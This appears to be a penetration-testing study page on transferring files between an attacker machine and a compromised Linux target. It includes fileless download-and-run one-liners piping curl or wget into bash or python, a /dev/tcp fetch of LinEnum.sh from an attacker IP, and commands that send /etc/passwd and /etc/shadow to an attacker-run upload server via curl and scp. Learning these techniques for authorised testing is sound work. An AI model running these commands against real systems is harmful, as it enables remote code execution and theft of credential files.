# Linux Target

## Download Operations (Attacker -> Target)

### Base64 Encoding and Decoding

If you have access toa  terminal on the target, you can just paste base64 into it and decode it

### Web Downloads with Wget and cURL

```bash
wget <URL> -O <PATH_OUTPUT>
```

```bash
curl -o <PATH_OUTPUT> <URL>
```

### Fileless

Because of the way Linux works and how [pipes operate](https://www.geeksforgeeks.org/piping-in-unix-or-linux/), most of the tools we use in Linux can be used to replicate fileless operations, which means that we don't have to download a file to execute it.

{% hint style="info" %}
Some payloads such as `mkfifo` write files to disk. Keep in mind that while the execution of the payload may be fileless when you use a pipe, depending on the payload chosen it may create temporary files on the OS.
{% endhint %}

**Fileless Download with cURL**

```bash
curl <URL> | bash
```

```bash
wget -qO- <URL> | python3
```

### Download with Bash (/dev/tcp)

There may also be situations where none of the well-known file transfer tools are available. As long as Bash version 2.04 or greater is installed (compiled with --enable-net-redirections), the built-in /dev/TCP device file can be used for simple file downloads.

```bash
exec 3<>/dev/tcp/10.10.10.32/80
```

```bash
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
```

```bash
cat <&3
```

### SSH Downloads

On the Attacker machine install and/or enable SSH

```bash
sudo systemctl enable ssh
```

```bash
sudo systemctl start ssh
```

On the Target machine:

```bash
scp plaintext@192.168.49.128:/root/myroot.txt . 
```

{% hint style="info" %}
You can create a temporary user account for file transfers and avoid using your primary credentials or keys on a remote computer.
{% endhint %}

***

## Upload Operations (Target -> Attacker)

### Web Upload

Same method as in Windows by creating an http server that allows uploads:

```bash
sudo python3 -m pip install --user uploadserver
```

we can add to it a self-signed certificate:

```bash
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
```

(The webserver should not host the certificate. We recommend creating a new directory to host the file for our webserver)

```bash
sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
```

Finally let's upload multiple files in one request, from the Target machine run:

```bash
curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
```

We used the option `--insecure` because we used a self-signed certificate that we trust.

### Alternative Web File Transfer Method

Since Linux distributions usually have `Python` or `php` installed, starting a web server to transfer files is straightforward. Also, if the server we compromised is a web server, we can move the files we want to transfer to the web server directory and access them from the web page, which means that we are downloading the file from our Pwnbox.

```bash
python3 -m http.server
```

```bash
python2.7 -m SimpleHTTPServer
```

```bash
php -S 0.0.0.0:8000
```

```bash
ruby -run -ehttpd . -p8000
```

Then download the file normally from the Attacker machine

### SCP Upload

```bash
scp /etc/passwd <username>@<IP>:/home/kali/
```